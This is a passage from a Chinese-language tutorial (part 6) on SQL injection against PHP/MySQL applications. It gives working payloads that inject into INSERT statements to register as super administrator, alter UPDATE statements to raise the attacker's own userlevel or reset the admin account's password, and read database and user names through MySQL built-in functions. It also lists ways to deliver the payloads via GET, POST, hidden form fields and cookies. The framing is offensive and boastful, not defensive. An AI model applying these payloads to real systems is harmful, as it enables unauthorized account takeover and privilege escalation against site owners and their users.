php SQL Injection with MySQL(6)

　　默认userlevel字段是插入1，其中的变量都是没有经过过滤就直接写入数据库的，不知道大家有什么想法？对，就是直接注入，使我们一注册就是超级管理员。我们注册的时候，构造$homepage变量，就可以达到改写的目的，指定$homepage变量为：

', '3')#

 

　　插入数据库的时候就变成：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

 

　　这样就注册成为超级管理员了。但这种利用方法也有一定的局限性，比如，我没有需要改写的变量如userlevel字段是数据库的第一个字段，前面没有地方给我们注入，我们也没有办法了。
或许INSERT还有更广泛的应用，大家可以自行研究，但原理都是一样的。

UPDATE

　　和INSERT相比，UPDATE的应用更加广泛，如果过滤不够，足以改写任何数据，还是拿刚才的注册程序来说，数据结构也不变，我们看一下用户自己修改自己的资料，SQL语句一般都是这样写的：

UPDATE user SET password='$password', homepage='$homepage' WHERE

 

　　用户可以修改自己的密码和主页，大家有什么想法？总不至于还是提升权限吧？程序中的SQL语句又没有更新userlevel字段，怎么提升啊？还是老办法，构造$homepage变量, 指定$homepage变量为：

', userlevel='3

 

　　整个SQL语句就变成这样：

UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE

 

　　我们是不是又变成超级管理员了？程序不更新userlevel字段，我们自己来。
还有更加绝的，直接修改任意用户的资料，还是刚才的例句，但这次安全一点，使用MD5加密：

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE

 

　　尽管密码被加密了，但我们还是可以构造我们需要的语句，我们指定$password为：

mypass)' WHERE username='admin'#

 

　　这时整个语句变为：

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE

 

　　这样就更改了更新的条件，我管你后面的代码是不是在哭这说：我们还没有执行啊。当然，也可以从$id下手，指定$id为：

' OR username='admin'

 

　　这时整个语句变为：

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE OR username='admin'

 

　　照样也可以达到修改的目的，所以说注入是非常灵活的技术。如果有些变量是从数据库读取的固定值，甚至用$_SESSION['username']来读取服务器上的SESSION信息时，我们就可以在原来的WHERE之前自己构造WHERE并注释掉后面的代码，由此可见，灵活运用注释也是注入的技巧之一。这些技巧把注入发挥得淋漓尽致。不得不说是一种艺术。
　　变量的提交方式可以是GET或POST，提交的位置可以是地址栏、表单、隐藏表单变量或修改本地COOKIE信息等，提交的方式可以是本地提交，服务器上提交或者是工具提交，多种多样就看你如何运用了。

高级应用

1、 使用MYSQL内置函数

　　我们在ACCESS、MSSQL中的注入，有很多比较高级的注入方法，比如深入到系统，猜中文等，这些东西，在MYSQL也能很好得到发挥，其实在MYSQL有很多内置函数都可以用在SQL语句里，这样就可以使我们能在注入时更灵活，得到更多关于系统的信息。有几个函数是比较常用的：

DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
……

 

　　各个函数的具体作用大家可以查阅MYSQL手册，比如下面这句UPDATE：

UPDATE article SET title=$title WHERE articleid=1

 

　　我们可以指定$title为以上的各个函数，因为没有被引号包含，所以函数是能正确执行的：

UPDATE article SET title=DATABASE() WHERE id=1
#把当前数据库名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段

 

　　灵活运用MYSQL内置的函数，可以获得不少有用的信息，比如数据库版本、名字、用户、当前数据库等，比如前面跨表查询的例子，提交：

?id=1